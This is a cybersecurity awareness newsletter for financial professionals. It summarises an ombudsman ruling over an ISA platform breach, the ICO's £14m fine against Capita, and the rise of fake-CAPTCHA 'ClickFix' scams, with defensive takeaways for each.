IFA told to compensate client over cyber breach
The Financial Ombudsman Service (FOS) ruled that an independent financial adviser (IFA) must compensate a client after a breach involving a third-party ISA platform. Attackers had gained access to the client’s ISA, added a new bank account and attempted to withdrawal nearly £10,000. Although no funds were ultimately lost, the breach of personal and financial data led the client to hold the IFA accountable for how the third-party platform was managed and monitored.
Key take-away:
Cyber-criminals are increasingly targeting third-party providers to gain access to their network of customers. It’s essential to carry out due diligence on your key platform providers and suppliers before onboarding and continue to monitor them annually.
At a minimum, you should expect third-party providers to meet information security standards (Cyber Essentials, ISO 27001 etc) and have layered security controls in place to prevent constantly evolving threats that cover people, processes and technology. Engaging with industry experts to conduct independent system testing, and rehearsing incident response plans is also good practice.
If you’re unsure of where the start when it comes to cyber security, the National Cyber Security Centre (NCSC) launched the Cyber Action Toolkit to help small organisations implement essential security measures. It also encourages the adoption of Cyber Essentials, which provides protection guidance and includes automatic cyber insurance for UK firms with under £20m turnover.
Capita fined £14m over data breach that saw customers information leaked
Capita was fined £14 million after a cyber-attack exposed the personal and financial details of 6.65 million people. The breach began on 22 March 2023, when an employee accidentally downloaded a malicious file. Although Capita detected the threat within 10 minutes, the infected device wasn’t quarantined for 58 hours—giving the attacker time to move through the network, gain admin access, and steal nearly a terabyte of data. By 31 March, ransomware had been deployed, passwords were reset, and staff were locked out of systems, prompting at least 93 complaints.
In its penalty notice, the Information Commissioner’s Office (ICO) states Capita failed to maintain adequate security measures to protect the data it held. It compared Capita’s shortcomings against several key frameworks and best practice standards, specifically, the UK General Data Protection Regulation (GDPR) obligation to implement and use appropriate technical and organisational security measures to prevent cyber-attacks.
Key take-away:
ICO penalty notices give a great insight into how cyber-attacks take place, and specifically what went wrong.
In this case, the Capita breach offers several important lessons:
- Act fast on alerts – Capita detected the threat early but waited 58 hours to isolate it, giving attackers time to spread and steal data.
- Have a clear incident response plan – everyone should know exactly what to do when an alert hits.
- Segregate admin and standard accounts – prevent attackers who compromise lower-tier accounts from gaining access to higher-tier systems
- Train staff – the breach began with a malicious file download. Awareness remains your first line of defence.
- Check supplier security – if third parties handle client data, ensure they meet strong security standards.
After a breach, the regulator will compare your security implementation against well-known security frameworks. It’s imperative that you understand and implement them so that you can demonstrate compliance and avoid large fines should the worst happen.
Global threat intelligence report highlights 500% surge in human-targeted ClickFix cyber attacks
The “I’m not a robot” tick boxes that pop up on websites are meant to avoid bots and prevent automated attacks. But sadly, cybercriminals are now turning this trusted feature into one of the fastest-growing attacks of 2025.
This fake CAPTCHA attack, often referenced as 'ClickFix' has surged by more than 500% this year. Here’s how these increasingly clever scams usually work:
- You visit a site, and a “CAPTCHA” prompt appears, looking just like the real thing.
- Instead of simply letting you through, it shows an error message with instructions - often asking you to complete ‘verification steps’ by copying, pasting, or running something on your device.
- If you carry out its request, you could end up handing over your passwords, sensitive data, and access to your accounts without realising what’s happened.
Key takeaway
Attackers know they need to constantly evolve their phishing and social engineering attacks to be successful — and ClickFix attacks are just one of the latest cyber scams going around. Ensure you, and your staff, keep on top of new threats and how cyber criminals are evolving their tactics. You can then adapt your defences to make yourself and your business more resilient to future online threats.
With a little awareness, you can spot the signs early and avoid being caught out. A real CAPTCHA will never ask you to:
- Copy, paste, or run any code
- Download a file to your device
- Enter your credentials outside the normal login box
- Press shortcuts like Windows+R, CTRL+V, or anything similar
This article is for financial professionals only. Any information contained within is of a general nature and should not be construed as a form of personal recommendation or financial advice. Nor is the information to be considered an offer or solicitation to deal in any financial instrument or to engage in any investment service or activity.
Parmenion accepts no duty of care or liability for loss arising from any person acting, or refraining from acting, as a result of any information contained within this article. All investment carries risk. The value of investments, and the income from them, can go down as well as up and investors may get back less than they put in. Past performance is not a reliable indicator of future returns.
